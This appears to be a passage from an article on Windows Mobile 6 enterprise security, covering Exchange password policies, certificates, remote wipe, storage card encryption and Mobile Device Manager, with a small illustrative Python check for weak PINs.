- Password protection: With Windows Mobile 6, Local Authentication Plug-ins can be used to allow Exchange Server to enforce password policies such as length, strength and history. For example, if you allow 4-digit PINs, you can enable pattern recognition that will prevent users from using simple PINs such as “1234.” Or you can prevent the use of PINs and require passwords of a specified length and strength. You can set expiration periods for passwords and you can prohibit reusing previous passwords. (A sketch of this kind of pattern check appears after this list.)
- Digital certificates: Windows Mobile can use digital certificates for network authentication, whereby the Exchange server checks the mobile device’s root certificate in order to create an SSL connection so that communications between the server and device are encrypted.
- Remote wipe: You can perform a remote wipe of the Windows Mobile device via Exchange synchronization or Outlook Web Access (OWA). All user data, keys and passwords and configuration settings are overwritten.
- Storage card protection: With Windows Mobile 6, you can encrypt the data on the storage card. When you do so, it can be read only on the device that encrypted it. This can be done via Exchange Server 2007 policies so that it can be controlled by the administrator, not left up to the user. Exchange Server 2007 can also perform a remote wipe of the storage card.
- Propagation of policies: Enterprise policies can be delivered to Windows Mobile devices when they synchronize with the Exchange server. Devices that do not comply with policies will not be allowed to synchronize with Exchange.
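To picture the kind of pattern recognition mentioned in the password protection item above, here is a small Python sketch; it is illustrative only and certainly not Microsoft’s actual algorithm:

def pin_is_weak(pin):
    """Reject repeated digits (1111) and ascending/descending runs (1234, 4321)."""
    if len(set(pin)) == 1:               # every digit the same
        return True
    steps = {int(b) - int(a) for a, b in zip(pin, pin[1:])}
    return steps == {1} or steps == {-1} # constant +1/-1 step between digits

print(pin_is_weak("1234"), pin_is_weak("9999"), pin_is_weak("2847"))
# True True False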
Microsoft’s System Center Mobile Device Manager can make it much easier to manage a large number of Windows Mobile 6.1 devices. It is integrated to work with Active Directory/Group Policy and can provide secure always-on VPN access from mobile devices. Administrators have control over the devices and can disable Bluetooth, Infrared, WLAN, POP/IMAP email and built-in cameras for better security. You can also enable full file encryption, track inventory data for all devices, and perform immediate remote wipes if a device is lost or stolen (without waiting for the device to sync with the server).